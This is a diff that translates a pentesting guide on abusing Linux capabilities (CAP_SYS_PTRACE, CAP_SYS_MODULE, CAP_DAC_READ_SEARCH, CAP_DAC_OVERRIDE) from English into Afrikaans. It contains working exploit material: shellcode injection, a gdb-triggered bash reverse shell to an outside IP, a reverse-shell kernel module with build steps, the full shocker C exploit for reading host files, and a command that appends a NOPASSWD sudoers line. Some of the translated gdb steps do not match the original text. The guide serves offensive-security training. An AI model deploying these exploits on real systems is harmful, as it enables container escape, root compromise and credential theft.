@@ -534,35 +505,35 @@ PTRACE_DETACH = 17 # Structure defined in # https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct class user_regs_struct(ctypes.Structure): - _fields_ = [ - ("r15", ctypes.c_ulonglong), - ("r14", ctypes.c_ulonglong), - ("r13", ctypes.c_ulonglong), - ("r12", ctypes.c_ulonglong), - ("rbp", ctypes.c_ulonglong), - ("rbx", ctypes.c_ulonglong), - ("r11", ctypes.c_ulonglong), - ("r10", ctypes.c_ulonglong), - ("r9", ctypes.c_ulonglong), - ("r8", ctypes.c_ulonglong), - ("rax", ctypes.c_ulonglong), - ("rcx", ctypes.c_ulonglong), - ("rdx", ctypes.c_ulonglong), - ("rsi", ctypes.c_ulonglong), - ("rdi", ctypes.c_ulonglong), - ("orig_rax", ctypes.c_ulonglong), - ("rip", ctypes.c_ulonglong), - ("cs", ctypes.c_ulonglong), - ("eflags", ctypes.c_ulonglong), - ("rsp", ctypes.c_ulonglong), - ("ss", ctypes.c_ulonglong), - ("fs_base", ctypes.c_ulonglong), - ("gs_base", ctypes.c_ulonglong), - ("ds", ctypes.c_ulonglong), - ("es", ctypes.c_ulonglong), - ("fs", ctypes.c_ulonglong), - ("gs", ctypes.c_ulonglong), - ] +_fields_ = [ +("r15", ctypes.c_ulonglong), +("r14", ctypes.c_ulonglong), +("r13", ctypes.c_ulonglong), +("r12", ctypes.c_ulonglong), +("rbp", ctypes.c_ulonglong), +("rbx", ctypes.c_ulonglong), +("r11", ctypes.c_ulonglong), +("r10", ctypes.c_ulonglong), +("r9", ctypes.c_ulonglong), +("r8", ctypes.c_ulonglong), +("rax", ctypes.c_ulonglong), +("rcx", ctypes.c_ulonglong), +("rdx", ctypes.c_ulonglong), +("rsi", ctypes.c_ulonglong), +("rdi", ctypes.c_ulonglong), +("orig_rax", ctypes.c_ulonglong), +("rip", ctypes.c_ulonglong), +("cs", ctypes.c_ulonglong), +("eflags", ctypes.c_ulonglong), +("rsp", ctypes.c_ulonglong), +("ss", ctypes.c_ulonglong), +("fs_base", ctypes.c_ulonglong), +("gs_base", ctypes.c_ulonglong), +("ds", ctypes.c_ulonglong), +("es", ctypes.c_ulonglong), +("fs", ctypes.c_ulonglong), +("gs", ctypes.c_ulonglong), +] libc = ctypes.CDLL("libc.so.6") 
@@ -586,13 +557,13 @@ shellcode = "\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5 # Inject the shellcode into the running process byte by byte. for i in xrange(0,len(shellcode),4): - # Convert the byte to little endian. - shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16) - shellcode_byte_little_endian=struct.pack(" ``` -Debug a root process with gdb ad copy-paste the previously generated gdb lines: +Voer die volgende gdb-opdragte in: +```bash +(gdb) set follow-fork-mode child +(gdb) set detach-on-fork off +(gdb) catch exec +(gdb) run +``` + +Wag totdat die proses uitgevoer word en dan voer die volgende gdb-opdragte in: + +```bash +(gdb) set follow-fork-mode parent +(gdb) set detach-on-fork on +(gdb) catch exec +(gdb) continue +``` + +Dit sal jou in staat stel om die root-proses te foutopspoor met gdb. ```bash # In this case there was a sleep run by root ## NOTE that the process you abuse will die after the shellcode 
@@ -663,117 +658,100 @@ Continuing. process 207009 is executing new program: /usr/bin/dash [...] ``` +**Voorbeeld met omgewing (Docker-ontsnapping) - Nog 'n gdb-misbruik** -**Example with environment (Docker breakout) - Another gdb Abuse** - -If **GDB** is installed (or you can install it with `apk add gdb` or `apt install gdb` for example) you can **debug a process from the host** and make it call the `system` function. (This technique also requires the capability `SYS_ADMIN`)**.** - +As **GDB** geïnstalleer is (of jy kan dit installeer met `apk add gdb` of `apt install gdb` byvoorbeeld), kan jy **'n proses vanaf die gasheer af ontleed** en dit die `system`-funksie laat aanroep. (Hierdie tegniek vereis ook die vermoë `SYS_ADMIN`). ```bash gdb -p 1234 (gdb) call (void)system("ls") (gdb) call (void)system("sleep 5") (gdb) call (void)system("bash -c 'bash -i >& /dev/tcp/192.168.115.135/5656 0>&1'") ``` - -You won’t be able to see the output of the command executed but it will be executed by that process (so get a rev shell). +Jy sal nie die uitset van die uitgevoerde bevel kan sien nie, maar dit sal deur daardie proses uitgevoer word (so kry 'n omgekeerde dop). {% hint style="warning" %} -If you get the error "No symbol "system" in current context." check the previous example loading a shellcode in a program via gdb. +As jy die fout "No symbol "system" in current context." kry, kyk na die vorige voorbeeld waar 'n skulpkode in 'n program gelaai word via gdb. 
{% endhint %} -**Example with environment (Docker breakout) - Shellcode Injection** - -You can check the enabled capabilities inside the docker container using: +**Voorbeeld met omgewing (Docker-ontsnapping) - Skulpkode-inspuiting** +Jy kan die geaktiveerde vermoëns binne die docker-houer nagaan deur die volgende te gebruik: ```bash capsh --print Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap+ep Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap Securebits: 00/0x0/1'b0 - secure-noroot: no (unlocked) - secure-no-suid-fixup: no (unlocked) - secure-keep-caps: no (unlocked) +secure-noroot: no (unlocked) +secure-no-suid-fixup: no (unlocked) +secure-keep-caps: no (unlocked) uid=0(root) gid=0(root) groups=0(root ``` +Lys **prosesse** wat op die **gasheer** loop `ps -eaf` -List **processes** running in the **host** `ps -eaf` - -1. Get the **architecture** `uname -m` -2. Find a **shellcode** for the architecture ([https://www.exploit-db.com/exploits/41128](https://www.exploit-db.com/exploits/41128)) -3. Find a **program** to **inject** the **shellcode** into a process memory ([https://github.com/0x00pf/0x00sec\_code/blob/master/mem\_inject/infect.c](https://github.com/0x00pf/0x00sec\_code/blob/master/mem\_inject/infect.c)) -4. **Modify** the **shellcode** inside the program and **compile** it `gcc inject.c -o inject` -5. **Inject** it and grab your **shell**: `./inject 299; nc 172.17.0.1 5600` +1. Kry die **argitektuur** `uname -m` +2. Vind 'n **shellcode** vir die argitektuur ([https://www.exploit-db.com/exploits/41128](https://www.exploit-db.com/exploits/41128)) +3. 
Vind 'n **program** om die **shellcode** in 'n proses se geheue in te spuit ([https://github.com/0x00pf/0x00sec\_code/blob/master/mem\_inject/infect.c](https://github.com/0x00pf/0x00sec\_code/blob/master/mem\_inject/infect.c)) +4. **Wysig** die **shellcode** binne die program en **kompileer** dit `gcc inject.c -o inject` +5. **Spuit** dit in en gryp jou **shell**: `./inject 299; nc 172.17.0.1 5600` ## CAP\_SYS\_MODULE -**[`CAP_SYS_MODULE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** empowers a process to **load and unload kernel modules (`init_module(2)`, `finit_module(2)` and `delete_module(2)` system calls)**, offering direct access to the kernel's core operations. This capability presents critical security risks, as it enables privilege escalation and total system compromise by allowing modifications to the kernel, thereby bypassing all Linux security mechanisms, including Linux Security Modules and container isolation. -**This means that you can** **insert/remove kernel modules in/from the kernel of the host machine.** +**[`CAP_SYS_MODULE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** gee 'n proses die mag om kernel modules te **laai en te verwyder (`init_module(2)`, `finit_module(2)` en `delete_module(2)` stelseloproepe)**, wat direkte toegang tot die kern van die kernel bied. Hierdie vermoë bied kritieke sekuriteitsrisiko's, aangesien dit bevoorregte eskalasie en totale stelselkompromieë moontlik maak deur wysigings aan die kernel toe te laat, en sodoende alle Linux-sekuriteitsmeganismes, insluitend Linux-sekuriteitsmodules en houer-isolasie, te omseil. +**Dit beteken dat jy kernel modules in die kernel van die gasheer masjien kan invoeg/verwyder.** -**Example with binary** - -In the following example the binary **`python`** has this capability. +**Voorbeeld met binêre** +In die volgende voorbeeld het die binêre **`python`** hierdie vermoë. 
```bash getcap -r / 2>/dev/null /usr/bin/python2.7 = cap_sys_module+ep ``` - -By default, **`modprobe`** command checks for dependency list and map files in the directory **`/lib/modules/$(uname -r)`**.\ -In order to abuse this, lets create a fake **lib/modules** folder: - +Standaard, **`modprobe`** opdrag kontroleer vir afhanklikheidlys en kaartlêers in die gids **`/lib/modules/$(uname -r)`**.\ +Om hiervan misbruik te maak, skep ons 'n vals **lib/modules**-gids: ```bash mkdir lib/modules -p cp -a /lib/modules/5.0.0-20-generic/ lib/modules/$(uname -r) ``` - -Then **compile the kernel module you can find 2 examples below and copy** it to this folder: - +Dan **kompileer die kernel module wat jy hieronder kan vind en kopieer** dit na hierdie folder: ```bash cp reverse-shell.ko lib/modules/$(uname -r)/ ``` - -Finally, execute the needed python code to load this kernel module: - +Uiteindelik, voer die nodige Python-kode uit om hierdie kernel-module te laai: ```python import kmod km = kmod.Kmod() km.set_mod_dir("/path/to/fake/lib/modules/5.0.0-20-generic/") km.modprobe("reverse-shell") ``` +**Voorbeeld 2 met binêre** -**Example 2 with binary** - -In the following example the binary **`kmod`** has this capability. - +In die volgende voorbeeld het die binêre **`kmod`** hierdie vermoë. ```bash getcap -r / 2>/dev/null /bin/kmod = cap_sys_module+ep ``` +Dit beteken dat dit moontlik is om die opdrag **`insmod`** te gebruik om 'n kernel-module in te voeg. Volg die voorbeeld hieronder om 'n **omgekeerde skulp** te kry deur van hierdie voorreg misbruik te maak. -Which means that it's possible to use the command **`insmod`** to insert a kernel module. Follow the example below to get a **reverse shell** abusing this privilege. 
- -**Example with environment (Docker breakout)** - -You can check the enabled capabilities inside the docker container using: +**Voorbeeld met omgewing (Docker-ontsnapping)** +Jy kan die geaktiveerde vermoëns binne die Docker-houer nagaan deur die volgende te gebruik: ```bash capsh --print Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap Securebits: 00/0x0/1'b0 - secure-noroot: no (unlocked) - secure-no-suid-fixup: no (unlocked) - secure-keep-caps: no (unlocked) +secure-noroot: no (unlocked) +secure-no-suid-fixup: no (unlocked) +secure-keep-caps: no (unlocked) uid=0(root) gid=0(root) groups=0(root) ``` +Binne die vorige uitset kan jy sien dat die **SYS\_MODULE** vermoë geaktiveer is. -Inside the previous output you can see that the **SYS\_MODULE** capability is enabled. - -**Create** the **kernel module** that is going to execute a reverse shell and the **Makefile** to **compile** it: +**Skep** die **kernel module** wat 'n omgekeerde skulp sal uitvoer en die **Makefile** om dit te **kompileer**: {% code title="reverse-shell.c" %} ```c 
@@ -789,45 +767,40 @@ static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/ // call_usermodehelper function is used to create user mode processes from kernel space static int __init reverse_shell_init(void) { - return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); +return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); } static void __exit reverse_shell_exit(void) { - printk(KERN_INFO "Exiting\n"); +printk(KERN_INFO "Exiting\n"); } module_init(reverse_shell_init); module_exit(reverse_shell_exit); ``` -{% endcode %} - {% code title="Makefile" %} ```bash obj-m +=reverse-shell.o all: - make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules +make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules clean: - make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean +make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean ``` {% endcode %} {% hint style="warning" %} -The blank char before each make word in the Makefile **must be a tab, not spaces**! +Die leë karakter voor elke woord in die Makefile **moet 'n tab wees, nie spasies nie**! {% endhint %} -Execute `make` to compile it. - +Voer `make` uit om dit te kompileer. ``` ake[1]: *** /lib/modules/5.10.0-kali7-amd64/build: No such file or directory. Stop. sudo apt update sudo apt full-upgrade ``` - -Finally, start `nc` inside a shell and **load the module** from another one and you will capture the shell in the nc process: - +Uiteindelik, begin `nc` binne 'n skulp en **laai die module** vanuit 'n ander skulp en jy sal die skulp in die nc-proses vasvang: ```bash #Shell 1 nc -lvnp 4444 
@@ -835,67 +808,57 @@ nc -lvnp 4444 #Shell 2 insmod reverse-shell.ko #Launch the reverse shell ``` +**Die kode van hierdie tegniek is gekopieer uit die laboratorium van "Misbruik van SYS\_MODULE-vermoë" van** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com) -**The code of this technique was copied from the laboratory of "Abusing SYS\_MODULE Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com) - -Another example of this technique can be found in [https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host](https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host) +'n Ander voorbeeld van hierdie tegniek kan gevind word by [https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host](https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host) ## CAP\_DAC\_READ\_SEARCH -[**CAP\_DAC\_READ\_SEARCH**](https://man7.org/linux/man-pages/man7/capabilities.7.html) enables a process to **bypass permissions for reading files and for reading and executing directories**. Its primary use is for file searching or reading purposes. However, it also allows a process to use the `open_by_handle_at(2)` function, which can access any file, including those outside the process's mount namespace. The handle used in `open_by_handle_at(2)` is supposed to be a non-transparent identifier obtained through `name_to_handle_at(2)`, but it can include sensitive information like inode numbers that are vulnerable to tampering. The potential for exploitation of this capability, particularly in the context of Docker containers, was demonstrated by Sebastian Krahmer with the shocker exploit, as analyzed [here](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3). 
-**This means that you can** **bypass can bypass file read permission checks and directory read/execute permission checks.** +[**CAP\_DAC\_READ\_SEARCH**](https://man7.org/linux/man-pages/man7/capabilities.7.html) stel 'n proses in staat om **om versperrings vir lees van lêers en lees en uitvoer van gide te omseil**. Dit word hoofsaaklik gebruik vir lêersoek- of leesdoeleindes. Dit stel egter ook 'n proses in staat om die `open_by_handle_at(2)`-funksie te gebruik, wat enige lêer kan benader, insluitend dié buite die proses se bergingsnaamruimte. Die handvatsel wat in `open_by_handle_at(2)` gebruik word, behoort 'n nie-deursigtige identifiseerder te wees wat verkry word deur `name_to_handle_at(2)`, maar dit kan sensitiewe inligting soos inode-nommers insluit wat vatbaar is vir manipulasie. Die potensiaal vir uitbuiting van hierdie vermoë, veral in die konteks van Docker-houers, is gedemonstreer deur Sebastian Krahmer met die shocker-uitbuiting, soos geanaliseer [hier](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3). +**Dit beteken dat jy versperrings vir lêerleestoestemming en gidslees-/uitvoertoestemming kan omseil.** -**Example with binary** - -The binary will be able to read any file. So, if a file like tar has this capability it will be able to read the shadow file: +**Voorbeeld met binêre** +Die binêre sal enige lêer kan lees. So, as 'n lêer soos tar hierdie vermoë het, sal dit die shadow-lêer kan lees: ```bash cd /etc tar -czf /tmp/shadow.tar.gz shadow #Compress show file in /tmp cd /tmp tar -cxf shadow.tar.gz ``` +**Voorbeeld met binary2** -**Example with binary2** - -In this case lets suppose that **`python`** binary has this capability. In order to list root files you could do: - +In hierdie geval stel ons voor dat die **`python`** binêre lêer hierdie vermoë het. 
Om roetebestande te lys, kan jy die volgende doen: ```python import os for r, d, f in os.walk('/root'): - for filename in f: - print(filename) +for filename in f: +print(filename) ``` - -And in order to read a file you could do: - +En om 'n lêer te lees, kan jy die volgende doen: ```python print(open("/etc/shadow", "r").read()) ``` +**Voorbeeld in omgewing (Docker-ontsnapping)** -**Example in Environment (Docker breakout)** - -You can check the enabled capabilities inside the docker container using: - +Jy kan die geaktiveerde vermoëns binne die Docker-houer nagaan deur die volgende te gebruik: ``` capsh --print Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap Securebits: 00/0x0/1'b0 - secure-noroot: no (unlocked) - secure-no-suid-fixup: no (unlocked) - secure-keep-caps: no (unlocked) +secure-noroot: no (unlocked) +secure-no-suid-fixup: no (unlocked) +secure-keep-caps: no (unlocked) uid=0(root) gid=0(root) groups=0(root) ``` +Binne die vorige uitset kan jy sien dat die **DAC\_READ\_SEARCH** vermoë geaktiveer is. As gevolg hiervan kan die houer **prosesse ontleed**. -Inside the previous output you can see that the **DAC\_READ\_SEARCH** capability is enabled. As a result, the container can **debug processes**. 
- -You can learn how the following exploiting works in [https://medium.com/@fun\_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3](https://medium.com/@fun\_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3) but in resume **CAP\_DAC\_READ\_SEARCH** not only allows us to traverse the file system without permission checks, but also explicitly removes any checks to _**open\_by\_handle\_at(2)**_ and **could allow our process to sensitive files opened by other processes**. - -The original exploit that abuse this permissions to read files from the host can be found here: [http://stealth.openwall.net/xSports/shocker.c](http://stealth.openwall.net/xSports/shocker.c), the following is a **modified version that allows you to indicate the file you want to read as first argument and dump it in a file.** +Jy kan leer hoe die volgende uitbuiting werk by [https://medium.com/@fun\_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3](https://medium.com/@fun\_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3), maar in opsomming **CAP\_DAC\_READ\_SEARCH** laat ons nie net toe om deur die lêersisteem te beweeg sonder toestemmingskontroles nie, maar verwyder ook uitdruklik enige kontroles vir _**open\_by\_handle\_at(2)**_ en **kan ons proses toelaat om sensitiewe lêers wat deur ander prosesse geopen is, te benader**. +Die oorspronklike uitbuiting wat hierdie vermoëns misbruik om lêers vanaf die gasheer te lees, kan hier gevind word: [http://stealth.openwall.net/xSports/shocker.c](http://stealth.openwall.net/xSports/shocker.c), die volgende is 'n **aangepaste weergawe wat jou in staat stel om die lêer wat jy wil lees as die eerste argument aan te dui en dit in 'n lêer te stort**. ```c #include #include 
@@ -912,203 +875,195 @@ The original exploit that abuse this permissions to read files from the host can // ./socker /etc/shadow shadow #Read /etc/shadow from host and save result in shadow file in current dir struct my_file_handle { - unsigned int handle_bytes; - int handle_type; - unsigned char f_handle[8]; +unsigned int handle_bytes; +int handle_type; +unsigned char f_handle[8]; }; void die(const char *msg) { - perror(msg); - exit(errno); +perror(msg); +exit(errno); } void dump_handle(const struct my_file_handle *h) { - fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes, - h->handle_type); - for (int i = 0; i < h->handle_bytes; ++i) { - fprintf(stderr,"0x%02x", h->f_handle[i]); - if ((i + 1) % 20 == 0) - fprintf(stderr,"\n"); - if (i < h->handle_bytes - 1) - fprintf(stderr,", "); - } - fprintf(stderr,"};\n"); +fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes, +h->handle_type); +for (int i = 0; i < h->handle_bytes; ++i) { +fprintf(stderr,"0x%02x", h->f_handle[i]); +if ((i + 1) % 20 == 0) +fprintf(stderr,"\n"); +if (i < h->handle_bytes - 1) +fprintf(stderr,", "); +} +fprintf(stderr,"};\n"); } int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh) { - int fd; - uint32_t ino = 0; - struct my_file_handle outh = { - .handle_bytes = 8, - .handle_type = 1 - }; - DIR *dir = NULL; - struct dirent *de = NULL; - path = strchr(path, '/'); - // recursion stops if path has been resolved - if (!path) { - memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle)); - oh->handle_type = 1; - oh->handle_bytes = 8; - return 1; - } +int fd; +uint32_t ino = 0; +struct my_file_handle outh = { +.handle_bytes = 8, +.handle_type = 1 +}; +DIR *dir = NULL; +struct dirent *de = NULL; +path = strchr(path, '/'); +// recursion stops if path has been resolved +if (!path) { +memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle)); +oh->handle_type = 1; +oh->handle_bytes = 8; +return 1; +} - ++path; - fprintf(stderr, "[*] 
Resolving '%s'\n", path); - if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0) - die("[-] open_by_handle_at"); - if ((dir = fdopendir(fd)) == NULL) - die("[-] fdopendir"); - for (;;) { - de = readdir(dir); - if (!de) - break; - fprintf(stderr, "[*] Found %s\n", de->d_name); - if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) { - fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino); - ino = de->d_ino; - break; - } - } +++path; +fprintf(stderr, "[*] Resolving '%s'\n", path); +if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0) +die("[-] open_by_handle_at"); +if ((dir = fdopendir(fd)) == NULL) +die("[-] fdopendir"); +for (;;) { +de = readdir(dir); +if (!de) +break; +fprintf(stderr, "[*] Found %s\n", de->d_name); +if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) { +fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino); +ino = de->d_ino; +break; +} +} - fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n"); - if (de) { - for (uint32_t i = 0; i < 0xffffffff; ++i) { - outh.handle_bytes = 8; - outh.handle_type = 1; - memcpy(outh.f_handle, &ino, sizeof(ino)); - memcpy(outh.f_handle + 4, &i, sizeof(i)); - if ((i % (1<<20)) == 0) - fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i); - if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) { - closedir(dir); - close(fd); - dump_handle(&outh); - return find_handle(bfd, path, &outh, oh); - } - } - } - closedir(dir); - close(fd); - return 0; +fprintf(stderr, "[*] Brute forcing remaining 32bit. 
This can take a while...\n"); +if (de) { +for (uint32_t i = 0; i < 0xffffffff; ++i) { +outh.handle_bytes = 8; +outh.handle_type = 1; +memcpy(outh.f_handle, &ino, sizeof(ino)); +memcpy(outh.f_handle + 4, &i, sizeof(i)); +if ((i % (1<<20)) == 0) +fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i); +if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) { +closedir(dir); +close(fd); +dump_handle(&outh); +return find_handle(bfd, path, &outh, oh); +} +} +} +closedir(dir); +close(fd); +return 0; } int main(int argc,char* argv[] ) { - char buf[0x1000]; - int fd1, fd2; - struct my_file_handle h; - struct my_file_handle root_h = { - .handle_bytes = 8, - .handle_type = 1, - .f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0} - }; - - fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n" - "[***] The tea from the 90's kicks your sekurity again. [***]\n" - "[***] If you have pending sec consulting, I'll happily [***]\n" - "[***] forward to my friends who drink secury-tea too! [***]\n\n\n"); - - read(0, buf, 1); - - // get a FS reference from something mounted in from outside - if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0) - die("[-] open"); - - if (find_handle(fd1, argv[1], &root_h, &h) <= 0) - die("[-] Cannot find valid handle!"); - - fprintf(stderr, "[!] 
Got a final handle!\n"); - dump_handle(&h); - - if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0) - die("[-] open_by_handle"); - - memset(buf, 0, sizeof(buf)); - if (read(fd2, buf, sizeof(buf) - 1) < 0) - die("[-] read"); - - printf("Success!!\n"); - - FILE *fptr; - fptr = fopen(argv[2], "w"); - fprintf(fptr,"%s", buf); - fclose(fptr); - - close(fd2); close(fd1); - - return 0; +char buf[0x1000]; +int fd1, fd2; +struct my_file_handle h; +struct my_file_handle root_h = { +.handle_bytes = 8, +.handle_type = 1, +.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0} +}; + +fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n" +"[***] The tea from the 90's kicks your sekurity again. [***]\n" +"[***] If you have pending sec consulting, I'll happily [***]\n" +"[***] forward to my friends who drink secury-tea too! [***]\n\n\n"); + +read(0, buf, 1); + +// get a FS reference from something mounted in from outside +if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0) +die("[-] open"); + +if (find_handle(fd1, argv[1], &root_h, &h) <= 0) +die("[-] Cannot find valid handle!"); + +fprintf(stderr, "[!] Got a final handle!\n"); +dump_handle(&h); + +if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0) +die("[-] open_by_handle"); + +memset(buf, 0, sizeof(buf)); +if (read(fd2, buf, sizeof(buf) - 1) < 0) +die("[-] read"); + +printf("Success!!\n"); + +FILE *fptr; +fptr = fopen(argv[2], "w"); +fprintf(fptr,"%s", buf); +fclose(fptr); + +close(fd2); close(fd1); + +return 0; } ``` - {% hint style="warning" %} -The exploit needs to find a pointer to something mounted on the host. The original exploit used the file /.dockerinit and this modified version uses /etc/hostname. If the exploit isn't working maybe you need to set a different file. To find a file that is mounted in the host just execute mount command: +Die uitbuiting moet 'n verwysing na iets vind wat op die gasheer gemonteer is. 
Die oorspronklike uitbuiting het die lêer /.dockerinit gebruik en hierdie aangepaste weergawe gebruik /etc/hostname. As die uitbuiting nie werk nie, moet jy dalk 'n ander lêer instel. Om 'n lêer te vind wat op die gasheer gemonteer is, voer jy net die mount-opdrag uit: {% endhint %} ![](<../../.gitbook/assets/image (407) (1).png>) -**The code of this technique was copied from the laboratory of "Abusing DAC\_READ\_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com) +**Die kode van hierdie tegniek is gekopieer uit die laboratorium van "Misbruik van die DAC\_READ\_SEARCH-vermoë" van** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com) ​
-​​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +​​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidgebeurtenis in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidprofessionals in elke dissipline. {% embed url="https://www.rootedcon.com/" %} ## CAP\_DAC\_OVERRIDE -**This mean that you can bypass write permission checks on any file, so you can write any file.** +**Dit beteken dat jy skryftoestemmingskontroles vir enige lêer kan omseil, sodat jy enige lêer kan skryf.** -There are a lot of files you can **overwrite to escalate privileges,** [**you can get ideas from here**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges). +Daar is baie lêers wat jy kan **oorweldig om voorregte te verhoog,** [**jy kan idees hier kry**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges). -**Example with binary** - -In this example vim has this capability, so you can modify any file like _passwd_, _sudoers_ or _shadow_: +**Voorbeeld met binêre** +In hierdie voorbeeld het vim hierdie vermoë, sodat jy enige lêer soos _passwd_, _sudoers_ of _shadow_ kan wysig: ```bash getcap -r / 2>/dev/null /usr/bin/vim = cap_dac_override+ep vim /etc/sudoers #To overwrite it ``` +**Voorbeeld met binêre nommer 2** -**Example with binary 2** - -In this example **`python`** binary will have this capability. You could use python to override any file: - +In hierdie voorbeeld sal die **`python`** binêre nommer hierdie vermoë hê. 
Jy kan python gebruik om enige lêer te oorskryf: ```python file=open("/etc/sudoers","a") file.write("yourusername ALL=(ALL) NOPASSWD:ALL") file.close() ``` +**Voorbeeld met omgewing + CAP_DAC_READ_SEARCH (Docker-ontsnapping)** -**Example with environment + CAP\_DAC\_READ\_SEARCH (Docker breakout)** - -You can check the enabled capabilities inside the docker container using: - +Jy kan die geaktiveerde vermoëns binne die Docker-houer nagaan deur die volgende te gebruik: ```bash capsh --print Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap Securebits: 00/0x0/1'b0 - secure-noroot: no (unlocked) - secure-no-suid-fixup: no (unlocked) - secure-keep-caps: no (unlocked) +secure-noroot: no (unlocked) +secure-no-suid-fixup: no (unlocked) +secure-keep-caps: no (unlocked) uid=0(root) gid=0(root) groups=0(root) ``` - -First of all read the previous section that [**abuses DAC\_READ\_SEARCH capability to read arbitrary files**](linux-capabilities.md#cap\_dac\_read\_search) of the host and **compile** the exploit.\ -Then, **compile the following version of the shocker exploit** that will allow you to **write arbitrary files** inside the hosts filesystem: - +Eerstens lees die vorige afdeling wat [**misbruik maak van die DAC\_READ\_SEARCH-vermoë om willekeurige lêers te lees**](linux-capabilities.md#cap\_dac\_read\_search) van die gasheer en **kompileer** die uitbuiting.\ +Daarna, **kompileer die volgende weergawe van die shocker-uitbuiting** wat jou sal toelaat om **willekeurige lêers te skryf** binne die gasheer se lêersisteem: ```c #include #include 
